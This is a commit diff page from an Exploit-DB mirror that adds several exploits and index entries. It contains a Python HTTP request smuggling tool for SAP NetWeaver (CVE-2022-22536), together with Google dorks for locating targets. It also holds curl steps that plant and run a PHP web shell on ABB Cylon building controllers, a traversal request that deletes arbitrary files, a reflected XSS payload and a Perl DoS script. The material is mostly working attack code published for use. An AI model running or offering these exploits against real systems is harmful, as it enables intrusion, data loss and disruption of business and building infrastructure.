bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-04 00:01:15 +00:00
commit 4a46a3ba95
6 changed files with 647 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

359
exploits/multiple/remote/52109.txt Normal file
View file

@ -0,0 +1,359 @@
# Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door
# Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks
# Date: Tuesday, April 2, 2025
# Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
# Vendor Homepage: https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request smuggling-and-request-concatenation/ba-p/13528083
# Software Link: https://help.sap.com/docs/SUPPORT_CONTENT/uiwits/3361892375.html
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver
Application Server Java, ABAP Platform, SAP Content Server 7.53 and
SAP Web Dispatcher
# Tested on: Red Hat Enterprise Linux (RHEL)
# CVE : 2022-22536
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
------
SAPGateBreaker - CVE-2022-22536 HTTP Request Smuggler
Author: @C41Tx90 - Victor de Queiroz | elytronsecurity.com |
becodoexploit.com
----------------------------------------------------------------------------
Target: SAP NetWeaver Application Server
Vulnerability: CVE-2022-22536
Exploit Type: HTTP Request Smuggling (Content-Length-based)
Impact: ACL Bypass, Internal Access
More information and explanations:
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
----------------------------------------------------------------------------
Sample Payload:
----------------------------------------------------------------------------
GET /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0)
Gecko/20100101 Firefox/136.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.32.22.7:50000/sap/admin/public/default.html
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: saplb_*=(J2EE7364720)7364750
Authorization: Basic YTph
Content-Length: 89
0\r
\r
GET /heapdump/ HTTP/1.1\r
Host: 127.0.0.1\r
X-Forwarded-For: 127.0.0.1\r
\r
----------------------------------------------------------------------------
Expected Response:
----------------------------------------------------------------------------
HTTP/1.1 200 OK
server: SAP NetWeaver Application Server
last-modified: Tue, 01 Sep 2020 11:54:39 GMT
sap-cache-control: +3600
date: Tue, 01 Apr 2025 20:49:02 GMT
content-length: 4465
content-type: text/html
connection: Keep-Alive
x-dummy: 0
----------------------------------------------------------------------------
Indicators of Success:
- Status code 200 for internal endpoints
- Difference between direct access (403/404) and smuggled (200)
- Access to otherwise restricted SAP services via loopback injection
----------------------------------------------------------------------------
Example Paths Tested:
- /sap/public/bc/icf/info
- /sap/bc/webdynpro/sap/appl_soap_management
- /heapdump/
- /ctc/ConfigServlet
- /sap/public/bc/icf/logon.html
- /webdynpro/resources/sap.com/tc~lm~config~content/
----------------------------------------------------------------------------
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
Google Dorks:
intitle:"SAP NetWeaver Application Server Java" inurl:/webdynpro/resources/
intitle:"SAP NetWeaver" "SAP J2EE Engine"
intitle:"Welcome to SAP NetWeaver" inurl:/irj/portal
intitle:"SAP NetWeaver Administrator" inurl:/nwa
inurl:"/sap/bc/webdynpro" -site:sap.com
inurl:"/sap/public" "SAP NetWeaver"
inurl:"/sap/admin/public/default.html"
inurl:"/webdynpro/welcome/Welcome.html"
inurl:"/sap/public/info.jsp"
"Powered by SAP NetWeaver" inurl:sap
intitle:"SAP Web Dispatcher Administration"
----------------------------------------------------------------------------
# Exploit
import argparse
import http.client
from urllib.parse import urlparse
from colorama import Fore, Style, Back, init
import os
init(autoreset=True)
BANNER = f"""
{Fore.WHITE}
+---------------------------+
(\__/\ Breaking the Gate |
{Style.BRIGHT}{Fore.WHITE}by{Style.RESET_ALL}
{Fore.YELLOW}@C41Tx90{Fore.WHITE} |
({Fore.RED}•{Fore.WHITE}デ{Fore.RED}•{Fore.WHITE})
{Style.BRIGHT}{Fore.YELLOW} CVE-2022-22536{Style.RESET_ALL} |
{Fore.GREEN}t.me/becodoxpl{Fore.WHITE} |
/ つ {Fore.WHITE}HTTP Request Smuggler |
{Fore.YELLOW}becodoexploit.com{Fore.WHITE} |
|
{Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE} |
+---------------------------+
"""
def detect_sap_version(host, port, is_https):
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port, timeout=5)
conn.request("GET", "/")
res = conn.getresponse()
headers = {k.lower(): v for k, v in res.getheaders()}
server_header = headers.get("server", "Unknown")
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP Server
Header: {Fore.CYAN}{server_header}\n")
return server_header
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Could not determine SAP
version: {e}\n")
return "Unknown"
def build_smuggled_request(path):
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost:
127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
def try_file_read(host, port, is_https, verbose):
test_paths = [
"/sap/public/bc/icf/info",
"/sap/public/info.jsp",
"/sap/public/test/test.jsp",
"/sap/bc/webdynpro/sap/appl_soap_management",
"/sap/public/bc/soap/rfc",
"/webdynpro/welcome/Welcome.html",
"/sr_central",
"/useradmin/.jsp",
"/heapdump/",
"/startPage",
"/crossdomain.xml",
"/ctc/ConfigServlet",
"/webdynpro/resources/sap.com/tc~lm~config~content/",
"/sld",
"/sap/bc/webdynpro/sap/wdy_cfg_component_config",
"/sap/public/bc/icf/logon.html",
"/sap/bc/webdynpro/sap/itadmin",
"/sap/public/bc/sec/saml2",
"/sap/public/bc/webdav"
]
print(f"{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of Concept
for ACL Bypass via HTTP Request Smuggling{Style.RESET_ALL}\n")
for path in test_paths:
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
conn.request("GET", path)
res_direct = conn.getresponse()
content_direct = res_direct.read().decode(errors="ignore")
direct_status = res_direct.status
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error checking direct
access for {path}: {e}")
continue
body = build_smuggled_request(path)
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
try:
conn = conn_class(host, port)
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
smuggled_headers = res.getheaders()
content_smuggled = res.read().decode(errors="ignore")
smuggled_status = res.status
status_color = Fore.GREEN if smuggled_status !=
direct_status else Fore.RED
print(f"{status_color}[-] {Fore.LIGHTBLUE_EX}{path}
{Style.BRIGHT}{Fore.WHITE}Direct Access:
{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled Access:
{status_color}({smuggled_status}){Style.RESET_ALL}")
if smuggled_status == direct_status:
print(f"{Fore.RED}[x] {Fore.WHITE}Exploit did not work
for {path}\n")
with open("poc.txt", "a") as f:
f.write(f"\n--- Path: {path} ---\n")
f.write(f"Direct: {direct_status}\nSmuggled:
{smuggled_status}\n")
f.write(f"Smuggled Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Smuggled Response Headers:\n")
for h in smuggled_headers:
f.write(f"{h[0]}: {h[1]}\n")
if verbose:
f.write(f"\nSmuggled Response Body:\n{content_smuggled}\n")
f.write(f"\nDirect Response:\n{content_direct}\n")
if verbose:
print(f"\n{Fore.BLUE}>>> Sent Payload to
{path}:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST
/sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if smuggled_status == 500
else Fore.CYAN}{Fore.WHITE}HTTP/1.1
{smuggled_status}{Style.RESET_ALL}")
for h in smuggled_headers:
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
print(f"\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}")
def send_smuggled_request(target, verbose):
parsed = urlparse(target)
is_https = parsed.scheme == 'https'
port = parsed.port or (443 if is_https else 80)
host = parsed.hostname
print(BANNER)
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536
exploitation on {host}:{port}\n")
detect_sap_version(host, port, is_https)
body = build_smuggled_request("/sap/bc/webdynpro/sap/appl_soap_management")
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
try:
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
content = res.read().decode(errors="ignore")
status_display = f"HTTP/{res.version/10:.1f} {res.status} {res.reason}"
is_exploit_success = res.status in [200, 500, 403, 302]
print(f"{Fore.GREEN if is_exploit_success else Fore.RED}[-]
{Fore.WHITE}Exploit executed{' successfully' if is_exploit_success
else ''}! {Fore.YELLOW}CVE-2022-22536")
print(f"{Fore.WHITE}{'-'*60}\n")
print(f"{Fore.BLUE}>>> Sent Payload:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if res.status == 500 else
Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}")
for h in res.getheaders():
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
if verbose:
print(f"\n{Fore.CYAN}{content}{Style.RESET_ALL}")
with open("poc.txt", "w") as f:
f.write(f"Initial Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Initial Response:\n{status_display}\n")
for h in res.getheaders():
f.write(f"{h[0]}: {h[1]}\n")
f.write(f"\n{content}\n")
print("\n")
if is_exploit_success:
print(f"{Fore.GREEN}[=] {Fore.WHITE}The exploit executed
successfully and triggered an internal processing behavior. This
indicates a potential HTTP request smuggling condition.")
else:
print(f"{Fore.RED}[x] {Fore.WHITE}The exploit did not
trigger the expected behavior. Target may not be vulnerable.")
print(f"\n{Fore.WHITE}{'-'*60}\n")
try_file_read(host, port, is_https, verbose)
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}")
def main():
parser = argparse.ArgumentParser(description="CVE-2022-22536 Smuggling PoC")
parser.add_argument("-u", "--url", required=True, help="Target
full URL (e.g., http://host:port)")
parser.add_argument("--verbose", "-v", action="store_true",
help="Show full headers and responses")
args = parser.parse_args()
os.system('clear')
send_smuggled_request(args.url, args.verbose)
if __name__ == "__main__":
main()
----------------------------------------------------------------------------
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
https://launchpad.support.sap.com/#/notes/3123396
https://blogs.sap.com/2022/02/08/patch-your-sap-netweaver-application-server-asap-cve-2022-22536/

104
exploits/multiple/webapps/52107.NA Normal file
View file

@ -0,0 +1,104 @@
ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a remote code execution
vulnerability. The vulnerable uploadFile() function in bigUpload.php
improperly reads raw POST data using the php://input wrapper without
sufficient validation. This data is passed to the fwrite() function,
allowing arbitrary file writes. Combined with an improper sanitization
of file paths, this leads to directory traversal, allowing an attacker
to upload malicious files to arbitrary locations. Once a malicious file
is written to an executable directory, an authenticated attacker can
trigger the file to execute code and gain unauthorized access to the
building controller.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5828
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php
CVE ID: CVE-2024-6298
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
1.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "<?php\r\nif ($_GET['j']) {\r\nsystem($_GET['j']);\r\n}\r\n?>"
2.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> H "Content-Type: application/x-www-form-urlencoded"
3.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=finish" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "key=251&name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php"
4.
$ curl http://192.168.73.31/ZSL.php?j=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

24
exploits/php/webapps/52106.NA Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Reflected XSS in Elaine's Realtime CRM Automation v6.18.17
# Date: 09/2024
# Exploit Author: Haythem Arfaoui (CBTW Team)
# Vendor Homepage: https://www.elaine.io/
# Software Link:
https://www.elaine.io/en/products/elaine-marketing-automation/
# Version: 6.18.17 and below
# Tested on: Windows, Linux
# CVE : CVE-2024-42831
# Description
A reflected cross-site scripting (XSS) vulnerability in Elaine's Realtime
CRM Automation v6.18.17 allows attackers to execute arbitrary JavaScript
code in the web browser of a user via injecting a crafted payload into the
dialog parameter at wrapper_dialog.php.
# Steps to reproduce:
1. Navigate to any website that contains Elaine's Realtime CRM Automation
2. Navigate to this endpoint: /system/interface/wrapper_dialog.php
3. Append the payload *a"%20onafterscriptexecute=alert(document.domain)> *in
the *"dialog*" param and execute the request
4. Final URL
: /system/interface/wrapper_dialog.php?dialog=a"%20onafterscriptexecute=alert(document.domain)>

86
exploits/php/webapps/52108.NA Normal file
View file

@ -0,0 +1,86 @@
ABB Cylon Aspect 3.08.01 (databaseFileDelete.php) Arbitrary File Delete
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability.
Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly
sanitised before being used to delete files. This can be exploited by an unauthenticated
attacker to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5827
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5827.php
CVE ID: CVE-2024-6209
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -X POST http://192.168.73.31/databaseFileDelete.php \
> -d "file0=../../../../../../../../../home/MIX_CMIX/htmlroot/validate/validateHeader.php \
> &delete0=1 \
> &total=1 \
> &submitDeleteForm=Delete"
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>

68
exploits/windows/remote/52110.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
# Google Dork: N/A
# Date: 13 january 2024
# Exploit Author: Fernando Mengali
# Vendor Homepage: https://prosshd.com/
# Software Link: N/A
# Version: 1.2 20090726
# Tested on: Windows XP
# CVE: CVE-2024-0725
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {s
$cmd="clear";
}
system("$cmd");
intro();
main();
print "\t ==> Connecting to webserver... \n\n";
sleep(1);
my $i=0;
print "\t ==> Exploiting... \n\n";
my $payload = "\x41" x 500;
$connection2 = Net::SSH2->new();
$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$scpget = $connection2->scp_get($payload);
$connection2->disconnect();
print "\t ==> Done! Exploited!";
sub intro {
print q {
,--,
_ ___/ /\|
,;'( )__, ) ~
// // '--;
' \ | ^
^ ^
[+] ProSSHD 1.2 20090726 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: fernando.mengalli@gmail.com
}
}
sub main {
our ($ip, $port, $username, $password) = @ARGV;
unless (defined($ip) && defined($port)) {
print "\n\tUsage: $0 <ip> <port> <username> <password> \n";
exit(-1);
}
}

7
files_exploits.csv
View file

@ -8420,7 +8420,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35606,exploits/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",remote,linux,,2011-04-11,2014-12-25,1,CVE-2011-0285;OSVDB-71789,,,,,https://www.securityfocus.com/bid/47310/info
35132,exploits/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",remote,linux,,2010-12-21,2014-10-31,1,,,,,,https://www.securityfocus.com/bid/45537/info
16910,exploits/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,remote,linux,,2011-01-08,2011-03-06,1,OSVDB-69934,"Metasploit Framework (MSF)",,,,
49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,,2020-12-02,2020-12-02,0,,,,,,
49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,,2020-12-02,2025-04-02,0,CVE-2003-20001,,,,,
41,exploits/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,remote,linux,80,2003-06-09,2016-02-10,1,OSVDB-11873;CVE-2003-0437,,,,http://www.exploit-db.commnogosearch-3.1.20.tar.gz,
37949,exploits/linux/remote/37949.txt,"ModSecurity - 'POST' Security Bypass",2012-10-17,"Bernhard Mueller",remote,linux,,2012-10-17,2017-10-17,1,CVE-2012-4528;OSVDB-86408,,,,,https://www.securityfocus.com/bid/56096/info
26422,exploits/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,remote,linux,,2013-06-24,2013-06-24,1,CVE-2012-6495;OSVDB-88825;CVE-2012-6081,"Metasploit Framework (MSF)",,,http://www.exploit-db.commoin-1.9.5.tar.gz,
@ -11441,6 +11441,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28725,exploits/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",remote,multiple,,2006-09-28,2013-10-04,1,CVE-2006-5114;OSVDB-29489,,,,,https://www.securityfocus.com/bid/20244/info
4877,exploits/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Remote Command Execution",2008-01-09,"Luigi Auriemma",remote,multiple,7210,2008-01-08,,1,OSVDB-40210;CVE-2008-0244,,2008-sapone.zip,,,
30265,exploits/multiple/remote/30265.txt,"SAP Message Server - 'Group' Remote Buffer Overflow",2007-07-05,"Mark Litchfield",remote,multiple,,2007-07-05,2013-12-13,1,CVE-2007-3624;OSVDB-38096,,,,,https://www.securityfocus.com/bid/24765/info
52109,exploits/multiple/remote/52109.txt,"SAP NetWeaver - 7.53 - HTTP Request Smuggling",2025-04-02,C41Tx90,remote,multiple,,2025-04-02,2025-04-02,0,CVE-2022-22536,,,,,
25445,exploits/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution (Metasploit)",2013-05-14,Metasploit,remote,multiple,8000,2013-05-14,2013-05-14,1,OSVDB-93537,"Metasploit Framework (MSF)",,,,
25446,exploits/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution (Metasploit)",2013-05-14,Metasploit,remote,multiple,8000,2013-05-14,2013-05-14,1,OSVDB-93538;OSVDB-93537;OSVDB-93536;OSVDB-93535;OSVDB-93534;OSVDB-93533;OSVDB-93532;OSVDB-100704,"Metasploit Framework (MSF)",,,,
38805,exploits/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",remote,multiple,,2015-11-25,2015-11-25,1,CVE-2013-6025;OSVDB-98655,,,,,https://www.securityfocus.com/bid/63193/info
@ -11642,6 +11643,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,,2018-02-20,2018-02-21,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
34111,exploits/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",webapps,multiple,,2010-06-09,2014-07-19,1,,,,,,https://www.securityfocus.com/bid/40676/info
33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info
52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-02,0,CVE-2024-6298,,,,,
43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34369,,,,,
@ -13412,6 +13414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-23,1,CVE-2022-26521,,,,,
27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
